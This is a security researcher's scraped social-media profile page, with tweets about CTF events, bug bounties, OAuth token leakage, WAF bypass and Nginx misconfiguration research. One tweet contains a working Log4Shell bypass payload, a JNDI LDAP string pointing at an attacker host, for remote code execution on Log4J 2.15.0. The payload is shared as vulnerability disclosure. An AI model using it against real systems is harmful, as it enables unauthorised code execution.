Fredrik N. Almroth
@almroot
Followers
3K
Following
2K
Media
28
Statuses
921
Co-Founder & Security Researcher at @detectify. I code things to hack stuff. PGP/MIT: 0xEDF8D9828B06A7F7 #shellpopper
Sweden
Joined November 2011
🇸🇪Midnight Sun CTF is back for it's 6th straight year! Registration is open here: https://t.co/N4U2SzYfCq 🏆Qualifiers will run from 08 April, 2023 11:00 UTC -- 09 April, 2023 11:00 UTC 🥇On-site finals are on 18 August. As always check https://t.co/gRgvz52cA5 for details
1
5
22
Recording of “JavaScript Prototype Poisoning, an unexplored bug-class, and it’s everywhere“ by Christoffer Jerkeby & Anton Linné is up: https://t.co/Fr8AcrHz54
0
9
21
How to turn bugs into a "passive" income stream! ft @detectify’s @almroot
https://t.co/GVh2AkRKp4
#cybersecurity #bugbounty
3
36
131
I was finally able to disclose one of the examples from my last blog post https://t.co/pODPvDUOU9 Here's the PoC-movie from the report to Reddit:
Reddit disclosed a bug submitted by fransrosen: https://t.co/K1f1kRd7WU - Bounty: $10,000 #hackerone #bugbounty
11
105
422
I decided to make a homage-post to @homakov and @Nirgoldshlager about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunt for bugs ♥️ thank you. https://t.co/pODPvDUOU9
labs.detectify.com
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javascript-inclusions has multiple vulnerable scenarios where authorization codes or tokens...
20
376
983
Had a great conversation about @detectify ‘s crowdsource program with @almroot today in the studio. Def a interesting way of creating a passive income flow, submit a finding, preferably unauth, get it verified and get paid every time it hits / fires on any of their customers!
2
2
27
Bypassing CDN WAF’s with Alternate Domain Routing https://t.co/7lVmfuR5Ru
11
111
329
The @DeptofDefense VDP #ResearcheroftheMonth for January 2022 is @almroot. They submitted a critical report on manipulating DNS that enabled them to add DNS records to a DoD server! #VDPHackersFTW #cybersecurity
1
9
24
Just three days remaining to cast your vote for the top 10 hacking techniques of 2021! Massive thanks to everyone who has already taken part; more voters means higher quality results. https://t.co/hROcjUsg0Z
portswigger.net
Welcome to the community vote for the Top 10 Web Hacking Techniques of 2021.
3
26
107
Damn. This is really cool. Achieving RCE via LFI using Nginx as a way to upload a temporary file, even when PHP is hardened so other techniques will fail -
6
237
777
FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
15
371
969
Whole .cd zone down due to expired .net domain name (again) https://t.co/iyxoA4zJ9E
@almroot
1
2
2
I found some permission issues when hacking Apple CloudKit. I wrote about three of them @detectify labs, one where I accidentally deleted all shared Apple Shortcuts. https://t.co/bwNOLJIeIo
17
188
748
Alternate data streams sound like this 🤯 to you? Well, thankfully we have @almroot jumping in to help, telling us how to leak source code or bypass authentication with that 🦀 #bugbountytips 👇
2
71
268
HTTP/2: The Sequel is Always Worse by @albinowax
https://t.co/yoZYQJBz1J
portswigger.net
In this research paper James Kettle introduces multiple new classes of HTTP/2-exclusive attacks, demonstrated on popular websites and servers.
12
480
1K
I just released RadioSploit, an Android application allowing to sniff and inject Zigbee,Mosart and Enhanced ShockBurst packets from a Samsung Galaxy S20 smartphone without requiring any additional hardware:it diverts the Bluetooth controller to add new offensive capabilities.1/14
4
127
317
We did some fun tricks with nginx on bug bounties a while back, and made a post about out the configurations being vulnerable https://t.co/TJ8ma1tKjJ
labs.detectify.com
We found some interesting middleware misconfigurations and potential exploits affecting Nginx web servers, load balancers, and proxies.
8
242
535
New campaign targeting security researchers "Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations." https://t.co/ai6AG61E5Z
0
0
1